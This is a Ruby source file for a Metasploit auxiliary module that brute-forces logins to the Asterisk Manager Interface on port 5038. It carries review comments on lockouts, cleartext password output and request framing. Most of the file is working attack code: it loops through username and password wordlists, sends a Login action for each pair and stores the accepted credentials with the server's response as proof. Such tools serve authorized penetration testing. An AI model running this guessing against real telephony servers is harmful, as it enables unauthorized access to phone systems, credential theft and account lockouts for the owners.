Path: blob/master/modules/auxiliary/voip/asterisk_login.rb
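##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner that submits username/password pairs to the Login action
# of an Asterisk Manager service (AMI, default port 5038) and records every
# pair the service accepts.
#
# Points a reviewer or operator should know:
# - The module declares ACCOUNT_LOCKOUTS as a side effect; repeated failed
#   logins are the normal case for a run.
# - Every attempt opens a fresh TCP connection, reads the banner, sends one
#   Login action and disconnects, so server-side a run appears as many
#   short-lived connections to the manager port.
# - Candidate pairs are printed in clear text in verbose mode; accepted pairs
#   are always printed and are persisted through create_credential together
#   with the raw server response as proof.
# - The secret is placed in a plain `Secret:` header.
#   NOTE(review): whether the transport is encrypted depends on socket options
#   inherited from the Tcp mixin, which are not visible here - confirm.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute

  # Registers module metadata and the RPORT, USER_FILE and PASS_FILE options.
  #
  # @param info [Hash] metadata passed through to update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Asterisk Manager Login Utility',
        'Description' => %q{
          This module attempts to authenticate to an Asterisk Manager service. Please note
          that by default, Asterisk Call Management (port 5038) only listens locally, but
          this can be manually configured in file /etc/asterisk/manager.conf by the admin
          on the victim machine.
        },
        'Author' => [
          'dflah_ <dflah[at]alligatorteam.org>',
        ],
        'References' => [
          ['URL', 'http://www.asterisk.org/astdocs/node201.html'], # Docs for AMI
        ],
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ACCOUNT_LOCKOUTS],
          'Reliability' => []
        }
      )
    )

    wordlist_dir = File.join(Msf::Config.install_root, 'data', 'wordlists')

    register_options(
      [
        Opt::RPORT(5038),
        OptString.new(
          'USER_FILE',
          [
            false,
            'The file that contains a list of probable users accounts.',
            File.join(wordlist_dir, 'unix_users.txt')
          ]
        ),
        OptString.new(
          'PASS_FILE',
          [
            false,
            'The file that contains a list of probable passwords.',
            File.join(wordlist_dir, 'unix_passwords.txt')
          ]
        )
      ]
    )
  end

  # Stores an accepted username/password pair and the matching login record.
  #
  # The password is stored as private_data with private_type :password, i.e.
  # in recoverable form, and opts[:proof] is stored alongside the login.
  #
  # @param opts [Hash] expects :ip, :port, :user, :password and :proof
  # @return the value returned by create_credential_login
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: 'asterisk_manager',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Runs the credential loop for one host.
  #
  # Connection errors are reported only in verbose mode; any other
  # StandardError is additionally written to the framework log via elog.
  #
  # @param _ip [String] unused; do_login reads rhost/rport instead
  def run_host(_ip)
    print_status('Initializing module...')
    each_user_pass { |user, pass| do_login(user, pass) }
  rescue ::Rex::ConnectionError => e
    vprint_error("#{e.class}: #{e.message}")
  rescue StandardError => e
    elog("Asterisk login attempt failed", error: e)
    vprint_error("#{e.class}: #{e.message}")
  end

  # Sends a command to the manager service and keeps the reply in @result.
  #
  # Connects first when @connected is false. Any StandardError raised while
  # connecting, writing or reading is printed and swallowed here, in which case
  # @result stays '' - callers therefore see a failed exchange as an empty
  # reply, not as an exception.
  #
  # @param command [String, nil] raw bytes to send; do_login passes nil to
  #   read the banner only (presumably sock.put ignores nil - confirm)
  def send_manager(command = '')
    @result = ''
    unless @connected
      connect
      @connected = true
      # Short pause after connecting, before the first write/read.
      select(nil, nil, nil, 0.4)
    end
    sock.put(command)
    @result = sock.get_once || ''
  rescue StandardError => e
    print_error("Error: #{e}")
  end

  # Attempts a single AMI login and reports the pair when it is accepted.
  #
  # @param user [String] candidate username
  # @param pass [String] candidate password
  # @return [Symbol] :abort when no Asterisk banner was seen, :next_user on
  #   success, :fail otherwise (presumably interpreted by each_user_pass from
  #   the AuthBrute mixin - confirm)
  def do_login(user = '', pass = '')
    @connected = false
    send_manager(nil) # connect only

    unless @result.match?(/^Asterisk Call Manager/)
      print_error('Asterisk Manager does not appear to be running')
      # Close the socket on this path as well; the original returned without
      # disconnecting and left the connection open when the banner was wrong.
      disconnect
      return :abort
    end

    # Verbose output contains the candidate password in clear text.
    vprint_status("#{rhost}:#{rport} - Trying user:'#{user}' with password:'#{pass}'")
    # NOTE(review): user and pass are interpolated without escaping; a candidate
    # containing CR or LF would change the request framing, so the stored
    # credential would no longer match what was sent.
    cmd = "Action: Login\r\nUsername: #{user}\r\nSecret: #{pass}\r\n\r\n"
    send_manager(cmd)

    accepted = /Response: Success/.match?(@result)
    if accepted
      print_good("User: \"#{user}\" using pass: \"#{pass}\" - can login on #{rhost}:#{rport}!")
      report_cred(ip: rhost, port: rport, user: user, password: pass, proof: @result)
    end

    disconnect
    accepted ? :next_user : :fail
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout,
         ::Timeout::Error, ::Errno::EPIPE => e
    # send_manager already swallows StandardError, so these mainly cover
    # failures raised by disconnect or by the reporting calls.
    vprint_error(e.message)
    :fail
  end
end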